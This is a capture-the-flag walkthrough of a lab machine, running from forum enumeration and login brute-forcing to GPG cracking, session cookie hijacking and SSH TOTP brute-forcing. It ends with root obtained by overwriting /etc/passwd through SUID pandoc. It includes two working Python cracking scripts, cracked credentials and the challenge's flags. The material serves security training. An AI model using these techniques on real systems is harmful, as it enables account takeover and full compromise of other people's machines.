M4tr1x:ExitDenied

f79fdd51d8a5b67e8eb9e9ee00738991.png

Target IP: 10.10.235.41
Challenge Description:
e63dc3c886912d859c9741fd9236af0c.png


Reconnaissance

d92b9664932996e2a33c9ebb61cdf3b7.png
There are three TCP ports open on the target machine, as shown above: SSH, HTTP, and MySQL.

ee32cba6ad45bfdc2616285a22845c06.png
Performing an aggressive scan (service and version detection) against the three open TCP ports returns the result above. I will start enumeration with the HTTP service on port 80.


Enumeration

Port 80: HTTP
558c99a89ede0085114a164fd7c01e29.png
Browsing to port 80 displays the web application above.

2ce142ef01c4e61cca7ec4d9b5120537.png
I created a test account on this website, which lets me read the threads. Now I need to find the white rabbit.

a63fba04f8863dc5dbddb857a5b47d1b.png
After looking through the different users, I find the user with the name willis interesting. The profile of this user is shown above. Maybe I can read the threads this user has participated in?

60c76cf4a119d1ceeea459647c521473.png
The user with the white rabbit profile picture has posted in the thread above. Apparently this website has a bug bounty program located at /bugbounty.

8ddc4da888d3c1e2b2293e172ed70b75.png
Browsing to /bugbounty displays the webpage above. It mentions that the bug bounty report form is disabled for maintenance. Maybe there is further information in the source code of this webpage?

da65e43fcd5e1022a3fb07063f102a8b.png
And yep! All submitted reports are sent to /reportPanel.php, as shown above.

a76ff70fc4f297ebf48d55eda646089c.png
The /reportPanel.php webpage contains a list of all submitted bugs, as shown above. This is incredibly useful, as some of these bugs may still be unpatched. From the information above, the target machine is running MyBulletinBoard (MyBB). Maybe the application version is also disclosed?

74ccd27827c202e8c10feb313e62a84f.png
Out of all the bugs, I find the one above the most interesting. Apparently the web application has no lockout or rate limiting for failed login attempts; therefore, it is possible to brute-force the logins. This bug has been given the critical severity level too. Maybe I can test it against the super users? The passwords are also interesting.

544b214c0dda8016f83335c5ea81fd3a.png
In total, there are eight users with super privileges. The names of these users are shown above.

1565901640c9cd7862fd25c71ccc6c23.png
On my machine, I made a file called usernames containing the names of the moderators and the administrator, as shown above. Maybe I can use the passwords that I found in the report list?

6ab37202e8ae6cffff03310b6094af48.png
I tried to brute-force the logins using hydra, but had no luck. Using Burp Suite, I intercepted a login request and, in Intruder, set the payload positions for the username and password as shown above.

5e9a5fb420142f08c3b16cea83616da5.png
The attack type I used is Cluster Bomb, which tries every username against every password. The first payload list contains the usernames of the administrator and moderators. The second payload list contains the passwords which I found in the bug bounty reports, as shown above.

71ec08bb3150098445fc2c2f49c5e227.png
After launching the attack, I obtained two working moderator credentials: PalacerKing:qwerty and ArnoldBagger:Luisfactor05, as shown above. Maybe these users have sensitive information, such as private messages, that I can read?

84aebd93b4568637071b372cc860eb75.png
After logging in as the moderator PalacerKing on the website, I notice this user has an unread private message about a plugin from the moderator ArnoldBagger as shown above.

6bd1dd1dc5251c14321e2e2b38ce42e0.png
The private message contains the information above. The mention of version 3 of the mod manager plugin for MyBB sounds interesting. Maybe there is more information about this plugin under the account ArnoldBagger?

384d738ef2408507e172bb0870c6dd63.png
And bingo! More information about the plugin is shown above. I need to find the location of this plugin now.

4c358d0c3be76043db340b0a447209fc.png
I checked the different message folders of the moderator ArnoldBagger and obtained the information above. The name /devBuilds sounds like a directory. Can I read the source code of the plugins there?

1442a5225ff5f31583a3c0b300f2bab3.png
Browsing to /devBuilds lists the plugins shown above. The modManagerv2.plugin is the biggest in file size, which makes it the most interesting to me. There is also an encrypted file named p.txt.gpg, as shown above. I downloaded the two interesting files to my machine.

c63479c2a85acfb97f92e73a613a623c.png
The source code of modManagerv2.plugin contains the interesting code above at line 29: the plugin reads the SQL password from the file p.txt.

0c840783a63cb9db8a0bb4f97355f623.png
The file also contains the MySQL username mod, as shown above. Time to decrypt the password. The next task is to find the keymaker.

4ed393a7fe1914cb99c612ad1c9f96b3.png
The /reportPanel.php page contains the message left behind by the keymaker, as shown above. Is /0100101101100101011110010110110101100001011010110110010101110010 another directory? Read as eight-bit ASCII, the binary string spells Keymaker.

5b7284d4d53de09fd95fd6359ef43738.png
And browsing to /0100101101100101011110010110110101100001011010110110010101110010 displays the webpage above.

43fcc87d71191a4029793f6e374dcdea.png
Viewing the source code of this new webpage reveals another hint left behind by the keymaker, as shown above. The variable chinese contains some English letters too, such as ofqxvg. The hint mentions that itertools.permutations() is one possible solution among several. Maybe I can generate the permutations of these English letters to crack the passphrase protecting the MySQL password?

8fa37f5031cc7fda0bf282473c531eff.png
Using an online tool, I obtained all permutations of the English letters, as shown above. I saved the result to a text file called perms on my machine. I also had to remove the leading spaces in front of the candidate passwords using the replace method.

92e8a7e2cb20f7bfdfe956d2199b5644.png
Then, using gpg2john, I extracted a crackable hash from p.txt.gpg. Using john with the perms wordlist, I successfully cracked the passphrase: fvgoxq, as shown above.

512ecaa9577e0cbedb68525dbeb6e19f.png
Then, using the command gpg -d p.txt.gpg and entering the passphrase fvgoxq, I obtained the MySQL password myS3CR3TPa55, as shown above.
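The permutation-wordlist step above, and the cracking step it feeds, as a single added Python example (this is not the author's script or the online tool they used). It builds the wordlist from the six letters in the hint with itertools.permutations(), writes it out without the leading spaces the online tool produced, and then, instead of gpg2john and john, tries each candidate directly as a symmetric passphrase with gpg in batch mode. It assumes gpg (2.1 or later, for --pinentry-mode loopback) is on the PATH and that p.txt.gpg is in the current directory; the letters ofqxvg are the ones the page quotes.

```python
#!/usr/bin/env python3
"""Permute a small alphabet into a wordlist and try each word as a GPG passphrase.

Added example for this writeup (not the author's code). Reproduces the
itertools.permutations() hint: the letters from the `chinese` variable are
permuted into candidates, and every candidate is tried against p.txt.gpg
non-interactively until one decrypts it.
"""
import itertools
import subprocess
import sys
from pathlib import Path
from typing import List, Optional

# Letters taken from the keymaker's hint quoted on the page.
HINT_LETTERS = "ofqxvg"


def permutation_wordlist(letters: str, min_len: Optional[int] = None) -> List[str]:
    """Return every distinct ordering of `letters`, longest-first by length band.

    By default only full-length permutations are produced (6! = 720 for six
    distinct letters). Pass min_len to also include shorter orderings when the
    passphrase length is not known.
    """
    if min_len is None:
        min_len = len(letters)
    seen = set()
    words: List[str] = []
    for n in range(min_len, len(letters) + 1):
        for perm in itertools.permutations(letters, n):
            word = "".join(perm)  # no leading whitespace, unlike the online tool's output
            if word not in seen:
                seen.add(word)
                words.append(word)
    return words


def write_wordlist(words: List[str], path: str) -> None:
    """Write one candidate per line, ready for john or hydra as well."""
    Path(path).write_text("\n".join(words) + "\n")


def try_passphrase(encrypted: str, passphrase: str, out_path: str) -> bool:
    """Attempt a symmetric decrypt in batch mode; True iff gpg exits 0."""
    result = subprocess.run(
        ["gpg", "--batch", "--yes", "--quiet", "--pinentry-mode", "loopback",
         "--passphrase", passphrase, "--output", out_path, "--decrypt", encrypted],
        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
    )
    return result.returncode == 0


def crack(encrypted: str, words: List[str], out_path: str = "p.txt") -> Optional[str]:
    """Return the first passphrase that decrypts `encrypted`, or None."""
    for word in words:
        if try_passphrase(encrypted, word, out_path):
            return word
    return None


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "p.txt.gpg"
    wordlist = permutation_wordlist(HINT_LETTERS)
    write_wordlist(wordlist, "perms")
    print(f"wrote {len(wordlist)} candidates to perms")
    found = crack(target, wordlist)
    print("passphrase:", found if found else "not found")
```

Spawning one gpg process per candidate is slow for large lists, but for 720 words it finishes in seconds and avoids a john dependency; for anything bigger, keep the `perms` file this writes and feed it to john as the page does.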

7ff7d8b526cb3d9f17d5c12d70de201a.png
And bingo! I successfully connected to the target machine's MySQL service using the credentials mod:myS3CR3TPa55, as shown above. Now I have access to the database.

06056168ca67879e24ae6cd6e0e1db4e.png
The database modManagerv2 contains one table called members. The content of this table is shown above. What is login_key?

2f318bc358592222402ed6cb11373e26.png
After some digging around, I notice the login_key is the value of the mybbuser cookie, which can be found in the browser's cookie storage. The cookie value is prefixed with a number, which is the position of the user in the members table. In the previous image, the user BlackCat is in position seven. After logging in as the user PalacerKing and changing mybbuser to 7_JY1Avl8cqCMkIFprMxWbTxwf8dSkiv7GJHzlPDWJWWg9gnG3FB, I gained access to the BlackCat user account.

dc339ad6eaf4df308432f73a28927d1c.png
And this user has the interesting files shown above.


Exploitation

41fb41d75940c9b4be1f2c65cd050582.png
The file SSH-TOTP documentation.pdf contains the content above. Is this the SSH authentication method used by the target machine? The algorithm for the secret is shown above.

e56e0812d8b8890f2f6a0a8d2ce870bd.png
The file testing.png contains the content above. There is one SSH username, architect, and there are three shared secret tokens.

cb97648880e7ac23e9837063dd3a0c19.png
After getting stuck here, I downloaded a copy of the script shown above to brute-force the OTP pin for the SSH login.

eb6e13959d712d0792a1cf71077f99ed.png
Then I modified the script, adding the three shared secret tokens, the IP of the target machine, and so on, and executed it. It found a valid OTP password for the user architect, and I SSHed into the target machine. Now I have a foothold on the target machine via SSH, as shown above.
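The page does not reproduce the SSH-TOTP document or the downloaded script, so the following is an added example rather than either of them. It assumes the scheme is standard RFC 4226 HOTP / RFC 6238 TOTP (HMAC-SHA1, 30-second step, 6 digits) and shows the part that makes the brute force cheap: with three shared secrets, the set of codes any of them yields within a small clock-skew window is at most a handful of values, not the full 10^6 code space. The SHARED_SECRETS placeholders are hypothetical and stand in for the three tokens in testing.png; the RFC test secret is used only to check the implementation.

```python
#!/usr/bin/env python3
"""Enumerate TOTP codes for several shared secrets across a clock-skew window.

Added example for this writeup, not the script the author downloaded. Assumes
RFC 4226 HOTP / RFC 6238 TOTP (HMAC-SHA1, 30 s step, 6 digits); the page does
not show the SSH-TOTP document's exact algorithm.
"""
import base64
import hashlib
import hmac
import struct
import time
from typing import Iterable, List, Optional, Union

Secret = Union[bytes, str]


def decode_secret(secret: Secret) -> bytes:
    """Accept raw key bytes, or a base32 string as used by most authenticator apps."""
    if isinstance(secret, bytes):
        return secret
    s = secret.strip().replace(" ", "").upper()
    s += "=" * (-len(s) % 8)  # restore padding that apps often strip
    return base64.b32decode(s)


def hotp(secret: Secret, counter: int, digits: int = 6, digest=hashlib.sha1) -> str:
    """RFC 4226: HMAC over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(decode_secret(secret), struct.pack(">Q", counter), digest).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: Secret, timestamp: Optional[float] = None, step: int = 30,
         digits: int = 6, digest=hashlib.sha1) -> str:
    """RFC 6238: HOTP with counter = floor(unix_time / step)."""
    if timestamp is None:
        timestamp = time.time()
    return hotp(secret, int(timestamp) // step, digits, digest)


def candidate_codes(secrets: Iterable[Secret], timestamp: Optional[float] = None,
                    skew_steps: int = 1, step: int = 30, digits: int = 6) -> List[str]:
    """Every code any secret yields for counters now-skew..now+skew, deduplicated.

    With three secrets and skew 1 that is at most nine codes, so trying them in
    order against the SSH prompt is a tiny search; widen skew_steps if the
    target's clock is known to drift.
    """
    if timestamp is None:
        timestamp = time.time()
    base = int(timestamp) // step
    ordered: List[str] = []
    for secret in secrets:
        for counter in range(base - skew_steps, base + skew_steps + 1):
            code = hotp(secret, counter, digits)
            if code not in ordered:
                ordered.append(code)
    return ordered


if __name__ == "__main__":
    # Hypothetical placeholders: substitute the three shared secrets from testing.png.
    SHARED_SECRETS = [b"shared-secret-one", b"shared-secret-two", b"shared-secret-three"]
    for code in candidate_codes(SHARED_SECRETS, skew_steps=1):
        print(code)
```

Feeding these candidates to an SSH client is deliberately left out: the right way depends on whether the server asks for the code as the password or as a keyboard-interactive prompt, which the page's screenshots, not this example, settle. Regenerate the list inside each 30-second step, since the codes change with the counter.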


Privilege Escalation

11129d15bce46b86b1e89b1a9b28694c.png
Running find / -perm -u=s -type f 2>/dev/null shows that /usr/bin/pandoc has the SUID bit set. Because pandoc runs as root and writes its output to any path given with -o, I can use it to overwrite /etc/passwd and set a password for the user root.

df4ae8b1e1298de3b166d275fce05678.png
I copied /etc/passwd to the home directory of user architect. Then I generated a password hash with the command openssl passwd rooted and obtained 2oW4gSLBIj5rA (a legacy DES crypt hash, which /etc/passwd still accepts in the password field), and placed it in the root entry of my copy. Then, using the command pandoc passwd -t plain -o /etc/passwd, I overwrote /etc/passwd with the modified file. The user root now has the password rooted.

7aa9e53a7ae4cad034cc5bcb1a11d054.png
I switched to the user root using the password rooted and now have root privileges on the target machine. But the root.txt flag is not located here.


Flags

f8fe546b6cb1b1e0c81b259325119390.png
The user.txt flag is shown above.

cddf15c91bdc3a9be008034f0ecbb06f.png
The root.txt flag is shown above. I had to use the command find / -name "*flag*" 2>/dev/null to locate the unusually named file /etc/-- -root.py. I read its content with the command cat '/etc/-- -root.py'. The real flag is Flag{R3ALw0r1D4507Ez09WExit}.

c04dce4738e95fad41d903db50a870fe.png
I ran the command find / -writable -type f 2>/dev/null and found bigpaul.txt. I know bigpaul is the username of the administrator on the web application. The content of this file is shown above. Can I use the credentials bigpaul:ilovemywifeandgirlfriend022366 on the web application? The ACP PIN arithmetic evaluates to 718008.

5e522fc7c92b20053253a48c630b699b.png
After logging in as the administrator bigpaul, I now have access to the administrator panel shown above.

867d489e8cbefc6147334158e074f78d.png
Scrolling a little further down the admin panel after logging in as bigpaul, the web.txt flag is there.